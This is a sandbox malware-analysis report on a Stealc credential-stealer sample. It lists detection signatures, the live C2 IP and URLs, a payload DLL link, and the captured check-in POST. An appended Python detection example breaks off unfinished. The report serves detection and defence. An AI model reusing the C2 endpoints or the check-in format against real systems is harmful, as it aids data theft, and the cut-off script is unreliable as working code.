Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561817
MD5: 6ae8d6dbe0f7340866c08c3f7b65978a
SHA1: b1afeaa2019c2df5c0be69191ed9c91ba0af72cd
SHA256: 425637dfc7232d7373898820b23226d268bf36496b766b5e367a06855864549f
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7476 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6AE8D6DBE0F7340866C08C3F7B65978A)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth, Stealc is a non-resident stealer with flexible data collection settings whose development builds on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Extracted malware configuration: {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Yara matches (Source | Rule | Description | Author):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.1518473176.00000000015ED000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1430969378.00000000052E0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 7476 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 7476 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
2024-11-24T11:33:32.820692+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49704 | 185.215.113.206 | 80 | TCP


              AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.206/c4becf79229cb002.phpKZ | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/ninet.dll | Avira URL Cloud: Label: malware
Source: file.exe.7476.0.memstrmin | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: file.exe | ReversingLabs: Detection: 39%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00904C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00904C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009240B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_009240B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009060D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_009060D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00916960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00916960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_0090EA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00909B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00909B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00909B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00909B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00916B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00916B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00907750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00907750
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009118A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_009118A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00913910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00913910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0091E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00911250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00911250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00911269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00911269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00912390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00912390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0090DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0090DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009123A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_009123A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0091CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00914B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00914B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00914B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00914B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0091DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0091D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009016B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_009016B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009016A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_009016A0

              Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49704 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
  Host: 185.215.113.206
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----CBKFIECBGDHJKECAKFBG
  Host: 185.215.113.206
  Content-Length: 211
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 46 39 41 46 42 33 31 30 36 30 33 38 31 30 32 38 39 34 34 38 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a
  Data Ascii:
    ------CBKFIECBGDHJKECAKFBG
    Content-Disposition: form-data; name="hwid"

    2DF9AFB310603810289448
    ------CBKFIECBGDHJKECAKFBG
    Content-Disposition: form-data; name="build"

    mars
    ------CBKFIECBGDHJKECAKFBG--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (reported 8 times; the C2 is addressed by raw IP, so no DNS lookup precedes the connection)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00904C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00904C50
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
  Host: 185.215.113.206
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----CBKFIECBGDHJKECAKFBG
  Host: 185.215.113.206
  Content-Length: 211
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw / Data Ascii: the same 211-byte body as the POST listed above (form fields hwid=2DF9AFB310603810289448 and build=mars)
Source: file.exe, 00000000.00000002.1518473176.00000000015CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1518473176.0000000001629000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1518473176.0000000001629000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/8
Source: file.exe, 00000000.00000002.1518473176.0000000001629000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1518473176.0000000001646000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1518473176.0000000001612000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.1518473176.00000000015CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpKZ
Source: file.exe, 00000000.00000002.1518473176.00000000015ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/ninet.dll
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00909770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop
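The only traffic the sandbox captured is a bare GET / followed by a 211-byte multipart POST to /c4becf79229cb002.php that carries just two form fields, hwid and build, with no User-Agent header. The Python below is an added example, not part of the Joe Sandbox report: it decodes the report's own Data Raw hex, parses the multipart body, recovers the two fields and checks the body length against the advertised Content-Length. The check-in heuristic at the end is derived from this single capture and is an assumption on my part, not the ET rule (SID 2044243) that fired.

```python
import re

# Copied from this report's capture: the headers of the POST to /c4becf79229cb002.php
# and the "Data Raw" hex rendering of its 211-byte body.
CHECKIN_HEADERS = {
    "Content-Type": "multipart/form-data; boundary=----CBKFIECBGDHJKECAKFBG",
    "Host": "185.215.113.206",
    "Content-Length": "211",
    "Connection": "Keep-Alive",
    "Cache-Control": "no-cache",
}
RAW_HEX = (
    "2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 "
    "74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 46 39 41 46 42 33 31 "
    "30 36 30 33 38 31 30 32 38 39 34 34 38 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 "
    "42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f "
    "73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 "
    "6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 "
    "44 48 4a 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a"
)


def boundary_from_content_type(content_type: str) -> str:
    """Pull the boundary parameter (quoted or bare) out of a multipart Content-Type."""
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not m:
        raise ValueError("no multipart boundary in Content-Type")
    return m.group(2)


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Minimal multipart/form-data parser: split on the dash-boundary, take the name=
    attribute from each part's Content-Disposition header, return {name: value}."""
    fields = {}
    for part in body.split(b"--" + boundary.encode()):
        part = part.strip(b"\r\n")
        if not part or part == b"--":            # preamble, or the closing "--" delimiter
            continue
        headers, _, value = part.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]*)"', headers)
        if m:
            fields[m.group(1).decode()] = value.decode("latin-1")
    return fields


def checkin_summary(raw_hex: str, headers: dict) -> dict:
    """Decode the captured body and compare its size with the advertised Content-Length."""
    body = bytes.fromhex(raw_hex)
    boundary = boundary_from_content_type(headers["Content-Type"])
    return {
        "length": len(body),
        "length_matches_header": len(body) == int(headers["Content-Length"]),
        "boundary": boundary,
        "fields": parse_multipart(body, boundary),
    }


def looks_like_stealc_checkin(fields: dict, headers: dict) -> bool:
    """Heuristic derived from this single capture (an assumption, not the ET rule that
    fired): a form carrying exactly hwid and build, sent with no User-Agent header."""
    has_user_agent = any(h.lower() == "user-agent" for h in headers)
    return set(fields) == {"hwid", "build"} and not has_user_agent


if __name__ == "__main__":
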